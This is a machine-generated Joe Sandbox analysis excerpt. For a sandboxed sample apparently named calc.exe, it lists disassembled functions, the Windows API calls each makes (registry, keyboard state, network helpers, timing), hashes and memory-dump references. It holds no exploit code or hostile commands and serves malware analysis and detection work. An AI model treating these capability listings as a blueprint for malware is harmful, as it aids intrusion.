Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseFreeHandleLibrary$FileUnmapView
String ID: su
API String ID: 1520591543-45427494
Opcode ID: ee261d1f32630aecec2c7b1bcd55743022462c26821aa0ceee38b670e699d694
Instruction ID: 5533a16e1b451d4dcc0f1a1567ab867aa15705d93646e9a3881281f64c75d125
Opcode Fuzzy Hash: ee261d1f32630aecec2c7b1bcd55743022462c26821aa0ceee38b670e699d694
Instruction Fuzzy Hash: 3A01B131600A19BFDE209F74DD44B96B7A8FF00701B14052AFD64E3250D7A8ECA18AA8

Function 0044C2B2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,0044D91A,0044C69D,00000000,0045B3A0,00000008,0044C6F4,?,?,?,00449A5F,00000004,0045B068,0000000C,00449AC3), ref: 0044C2B4
FlsGetValue.KERNEL32(?,00449A5F,00000004,0045B068,0000000C,00449AC3,000000E0,0044917B,?,00000001,00416BF3,00000010,?,004013F3), ref: 0044C2C2
FlsSetValue.KERNEL32(00000000,?,00449A5F,00000004,0045B068,0000000C,00449AC3,000000E0,0044917B,?,00000001,00416BF3,00000010,?,004013F3), ref: 0044C2E9
GetCurrentThreadId.KERNEL32 ref: 0044C301
SetLastError.KERNEL32(00000000,?,00449A5F,00000004,0045B068,0000000C,00449AC3,000000E0,0044917B,?,00000001,00416BF3,00000010,?,004013F3), ref: 0044C318

Strings

XF, xrefs: 0044C2F3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ErrorLastValue$CurrentThread
String ID: XF
API String ID: 526964173-166504293
Opcode ID: 0ce2ca5618a0c732420479d5d70867055caadec78b94139af839bb20ca1d17f1
Instruction ID: 1e9ca1f56f664176735d32dad2d1092eb4a2f929a253f0e119f46fcfb7a96736
Opcode Fuzzy Hash: 0ce2ca5618a0c732420479d5d70867055caadec78b94139af839bb20ca1d17f1
Instruction Fuzzy Hash: FDF0FC31503712DFE3302F61AD4D6563BA4EB00766F044529F986962A2DFB4CC008B99

Function 0043C7EA Relevance: 9.2, APIs: 6, Instructions: 219fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000), ref: 0043C865
GetStdHandle.KERNEL32(000000F6,0045C6D0), ref: 0043C8C2
GetLastError.KERNEL32(00000000,00000000), ref: 0043C91E
GetExitCodeProcess.KERNEL32(?,?), ref: 0043C959
GetLastError.KERNEL32(00000000,00000000), ref: 0043C98E

Part of subcall function 00417DBC: CloseHandle.KERNEL32 ref: 00417DD8
Part of subcall function 00417DBC: CloseHandle.KERNEL32(?), ref: 00417DE6
Part of subcall function 00417DBC: CloseHandle.KERNEL32(?), ref: 00417DF4
Part of subcall function 00417DBC: CloseHandle.KERNEL32(?), ref: 00417E06

ReadFile.KERNEL32(00000000,?,000000FF,?,00000000), ref: 0043CA20

Part of subcall function 0041684E: _strlen.LIBCMT ref: 0041685F
Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416879
Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416898

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Handle$Close$ErrorLast$ByteCharMultiWide$CodeExitFileProcessRead_strlen
String ID:
API String ID: 2518333764-0
Opcode ID: 88f7d1675431d1459f956e2285081511a60b043ee5b892d9ad6f6faf2ebf65cd
Instruction ID: 08a36f61e83a8decadca1c664de08f1ee49e3bfe3589df4b7dfc1e86d7019bb4
Opcode Fuzzy Hash: 88f7d1675431d1459f956e2285081511a60b043ee5b892d9ad6f6faf2ebf65cd
Instruction Fuzzy Hash: 4C81D371900259EFCF10EF65C8819EE7BB4AF08324F14566BF461B7291D7389E81CB59

Function 0042F7A7 Relevance: 9.2, APIs: 6, Instructions: 198networkCOMMON

Download Yara Rule

APIs

inet_ntoa.WS2_32(?), ref: 0042F8FC
htons.WS2_32(?), ref: 0042F937
_strlen.LIBCMT ref: 0042F97A

Part of subcall function 0041684E: _strlen.LIBCMT ref: 0041685F
Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416879
Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416898

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$htonsinet_ntoa
String ID:
API String ID: 1318844614-0
Opcode ID: cd67db129efb8f5173a493d414af0b0d9195f8c984bf61e2210114829332a795
Instruction ID: c535e4b204a39ed9355a5e9411ff9199073cd6162e92b6e8affce4dc956cf509
Opcode Fuzzy Hash: cd67db129efb8f5173a493d414af0b0d9195f8c984bf61e2210114829332a795
Instruction Fuzzy Hash: FB61B331500124ABDB10EFA5D8819DFB7B8EF45324BA4417BF814EB281DB38DD85CBA9

Function 004236D5 Relevance: 9.2, APIs: 6, Instructions: 188COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00423707
SHGetMalloc.SHELL32(?), ref: 00423714
SHGetDesktopFolder.SHELL32(?), ref: 00423799
SHBrowseForFolderW.SHELL32(?), ref: 00423877
SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0042389A
CoUninitialize.COMBASE ref: 004238E6

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Folder$BrowseDesktopFromInitializeListMallocPathUninitialize
String ID:
API String ID: 2328888689-0
Opcode ID: d1ca2607ed1fee0febd1e43b0f0d0ab9219c78b5fda21bd8a20f00a2eaf17138
Instruction ID: 9dfa527d82a11722d366a7158b9d2072c516f7a9572ea281cdfb609d7d1dcd87
Opcode Fuzzy Hash: d1ca2607ed1fee0febd1e43b0f0d0ab9219c78b5fda21bd8a20f00a2eaf17138
Instruction Fuzzy Hash: DF718EB5900219EFDB00EF95D8848CEB7B8FF48315B5481ABE505A7211DB38EE85CF98

Function 00454706 Relevance: 9.2, APIs: 6, Instructions: 168COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,00462758,00000001,?,0045C350,00000024,00000003), ref: 0045472A
GetLastError.KERNEL32 ref: 0045473C
GetStringTypeW.KERNEL32(?,?,?,?,0045C350,00000024,00000003), ref: 00454766
WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,0045C350,00000024,00000003), ref: 004547BE
WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000000), ref: 00454841
GetStringTypeA.KERNEL32(?,?,?,00000000,?), ref: 004548D3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: b414c8f4e6a59c5c2301a10d0c5c35c7491152d2ad8c82fdf03dfe15cf675e3d
Instruction ID: 1c1d1a3cfd943f37dbf2ab9dcfc78d84780ba350647b4ec12e8bbc28cf15e5f7
Opcode Fuzzy Hash: b414c8f4e6a59c5c2301a10d0c5c35c7491152d2ad8c82fdf03dfe15cf675e3d
Instruction Fuzzy Hash: BF51A071800219EBDF219FA4DC458EF7BB4FF4975AB20412BF810A6262D3388D95DB98

Function 0043C5A3 Relevance: 9.2, APIs: 6, Instructions: 162registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043C64B
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0043C690
RegCloseKey.ADVAPI32(?,00000000,00000000,00000000), ref: 0043C6C1
RegEnumValueW.ADVAPI32(00000001,-00000001,?,?,00000000,?,00000000,00000000), ref: 0043C6FC
RegCloseKey.ADVAPI32(00000001,00000000,?), ref: 0043C747
RegCloseKey.ADVAPI32(?), ref: 0043C751

Part of subcall function 0041FE6D: GetLastError.KERNEL32(00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE82
Part of subcall function 0041FE6D: FormatMessageW.KERNEL32(00001000,00000000,0047C7A0,00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE96

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Close$ConnectEnumErrorFormatLastMessageOpenRegistryValue
String ID:
API String ID: 773758466-0
Opcode ID: 312f3701fa08e1827a6c08e8f0d42657b7c62d5f7c573daf30e8066dccf5342e
Instruction ID: 20792c3d7f812a32157260c25cbcf3585e4f6a1056021a8675d112e4a3857f4a
Opcode Fuzzy Hash: 312f3701fa08e1827a6c08e8f0d42657b7c62d5f7c573daf30e8066dccf5342e
Instruction Fuzzy Hash: 43513D72900109FBCB14EFE1D8868EE7779EF08314F14546BF501B7162DB38AE859B99

Function 00453BD4 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,00462758,00000001,?,0045C138,0000001C,0044EC56,00000001,?,00000001,?,?,?,00000001,?,?), ref: 00453BF8
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,00000000,00455939,?), ref: 00453C0A
MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0045C138,0000001C,0044EC56,00000001,?,00000001,?,?,?,00000001), ref: 00453C6C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 00453CEA
GetStringTypeW.KERNEL32(?,?,00000000,?), ref: 00453CFC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ByteCharMultiStringTypeWide$ErrorLast
String ID:
API String ID: 3581945363-0
Opcode ID: 711614e0ad329d17c9121daf1de48bd08013e70841eb09083c1d63c1d91b531b
Instruction ID: 7b0bde08bb801c7efdf3f712f7aa1e62be76f32fac42d5e414aed62eba30da79
Opcode Fuzzy Hash: 711614e0ad329d17c9121daf1de48bd08013e70841eb09083c1d63c1d91b531b
Instruction Fuzzy Hash: D641F531800215EBDF229F50DC49AAF3BB5EF08793F14011AFD10A6252D738CE59DBA9

Function 00405E8E Relevance: 9.1, APIs: 6, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00405E9B
ScreenToClient.USER32(?,?), ref: 00405EB8
GetAsyncKeyState.USER32(00000001), ref: 00405EFB
GetKeyState.USER32(00000001), ref: 00405F09
GetAsyncKeyState.USER32(00000002), ref: 00405F23
GetKeyState.USER32(00000002), ref: 00405F2C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: State$Async$ClientCursorScreen
String ID:
API String ID: 1890669589-0
Opcode ID: 301c061da2982d33ea52afccf9ac44063f1c88073db3f05418d096a3cc27a1ec
Instruction ID: a365285c24f84e057ec1b9af2304b33fffce20543d84946f93603c3a6ce3a238
Opcode Fuzzy Hash: 301c061da2982d33ea52afccf9ac44063f1c88073db3f05418d096a3cc27a1ec
Instruction Fuzzy Hash: 1E41AB71404A05EBCF208FA4C844BEFBBB4FF54325F20852AE565762D1C339A980CF19

Function 00440AA4 Relevance: 9.1, APIs: 6, Instructions: 118windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0043F161: IsWindow.USER32(00000000), ref: 0043F18E

GetMenu.USER32(?), ref: 00440AE7
GetMenuItemCount.USER32(?), ref: 00440B09
GetMenuStringW.USER32(?,00000000,?,00007FFF,00000400), ref: 00440B35
GetMenuItemID.USER32(?,00000000), ref: 00440B9A
GetSubMenu.USER32(?,00000000), ref: 00440BA5
PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00440BDC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Menu$Item$CountMessagePostStringWindow
String ID:
API String ID: 3481743490-0
Opcode ID: c5eb56268e673ec37d2787644ad4e8aa42fcdcd23d0f9ea16b643641fee1fbd1
Instruction ID: 7c069f666623686826f3ddcb0e2fe3ddab47299d4bb218ac2af1fa814190d89b
Opcode Fuzzy Hash: c5eb56268e673ec37d2787644ad4e8aa42fcdcd23d0f9ea16b643641fee1fbd1
Instruction Fuzzy Hash: 97419471A00218AFEB11AFA5DC45B9E77B8EF04318F10406BF615B7251D778AE518B9C

Function 0040B6AE Relevance: 9.1, APIs: 6, Instructions: 93windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000003,00000000), ref: 0040B705
EnableWindow.USER32(00000000,00000000), ref: 0040B719
ShowWindow.USER32(00000003,00000000), ref: 0040B766
ShowWindow.USER32(00000000,00000004), ref: 0040B76E
EnableWindow.USER32(00000000,00000001), ref: 0040B782
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0040B7A6

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 94d56c342f8d4eab854a69fc706c86c6b5cc5f2542955767c30093fee8fa4aa4
Instruction ID: a343d61098662c026a0e05134150219735869de3340b639ff4ce1e3fe93cd216
Opcode Fuzzy Hash: 94d56c342f8d4eab854a69fc706c86c6b5cc5f2542955767c30093fee8fa4aa4
Instruction Fuzzy Hash: 5F315C70500344EFD722DF28C888B967BE0EF85704F1405AAEA51AB2E2C778A994CB5D

Function 0040CE65 Relevance: 9.1, APIs: 6, Instructions: 93COMMON

Download Yara Rule

APIs

_logf.LIBCPMT ref: 0040CED3
_logf.LIBCPMT ref: 0040CEEB
LineTo.GDI32(?,?,00000000), ref: 0040CF09
_logf.LIBCPMT ref: 0040CF23
_logf.LIBCPMT ref: 0040CF3B
LineTo.GDI32(?,?,00000000), ref: 0040CF53

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: _logf$Line
String ID:
API String ID: 3969295912-0
Opcode ID: 7e2386a04ee5375af61d30ea3763d67e5ddcd565e541af38a9463bf76d7220f1
Instruction ID: 021b2969e876ab9d9f3f238a6f546ee0806e31d252411d7e34cc42bcf1068359
Opcode Fuzzy Hash: 7e2386a04ee5375af61d30ea3763d67e5ddcd565e541af38a9463bf76d7220f1
Instruction Fuzzy Hash: BF31617150050AEFCF049F62EA495AE7F78FF50351F124169E881320A5D77898B6DF89

Function 004536F2 Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000000,?,0044BFA2,?,0045B1B8,00000060), ref: 00453705
GetLastError.KERNEL32(?,0044BFA2,?,0045B1B8,00000060), ref: 00453717
GetCommandLineW.KERNEL32(00000000,?,0044BFA2,?,0045B1B8,00000060), ref: 00453737
GetCommandLineA.KERNEL32(75730A60,?,00000000,?,0044BFA2,?,0045B1B8,00000060), ref: 00453742
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,?,00000000,?,0044BFA2,?,0045B1B8,00000060), ref: 00453758
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,?,00000000,?,0044BFA2,?,0045B1B8,00000060), ref: 00453779

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CommandLine$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1286790906-0
Opcode ID: 02724d1631cc760a401309809527718c91f5bb24f2b83228a4705527f0857e7c
Instruction ID: 6a2698e997fe883244a90919812289e027963571f45adb5c732ca680cf72a7a1
Opcode Fuzzy Hash: 02724d1631cc760a401309809527718c91f5bb24f2b83228a4705527f0857e7c
Instruction Fuzzy Hash: 281148F190821DABD6207EA59C84E37768DC70D3EBF21422BFD05C3183D699DD48866D

Function 00411E91 Relevance: 9.1, APIs: 6, Instructions: 56sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004115DC,?,?,00000000), ref: 00411EA3
QueryPerformanceCounter.KERNEL32(004115DC,?,?,?,?,?,?,?,?,?,004115DC,?,?,00000000), ref: 00411ED0
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004115DC,?,?,00000000), ref: 00411EDA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004115DC,?,?,00000000), ref: 00411EE2
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004115DC,?,?,00000000), ref: 00411EEC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 227dc428acba349b87143b21466f78d99fc1399157bde67c1f8ea1aba1aa589c
Instruction ID: fd00bcc09fcb72a1d4ee2113bc4141e302d44ef8310011320d93385828451225
Opcode Fuzzy Hash: 227dc428acba349b87143b21466f78d99fc1399157bde67c1f8ea1aba1aa589c
Instruction Fuzzy Hash: 73118F31D1462EEBCF009FE4ED89AEDBB78FF08301F0004A6E541A2161EB38D595C769

Function 0040CBFD Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 0040CCF8: DeleteObject.GDI32(?), ref: 0040CD3D
Part of subcall function 0040CCF8: ExtCreatePen.GDI32(?,?,?,00000000,00000000,?,?), ref: 0040CD84
Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CD94
Part of subcall function 0040CCF8: BeginPath.GDI32(?), ref: 0040CDAE
Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CDCD

MoveToEx.GDI32(?,?,00000000,00000000), ref: 0040CC31
LineTo.GDI32(?,?,00000000), ref: 0040CC41
MoveToEx.GDI32(?,?,-00000002,00000000), ref: 0040CC4F
LineTo.GDI32(?,?,-00000003), ref: 0040CC5B
EndPath.GDI32(?), ref: 0040CC6E
StrokePath.GDI32(?), ref: 0040CC7A

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
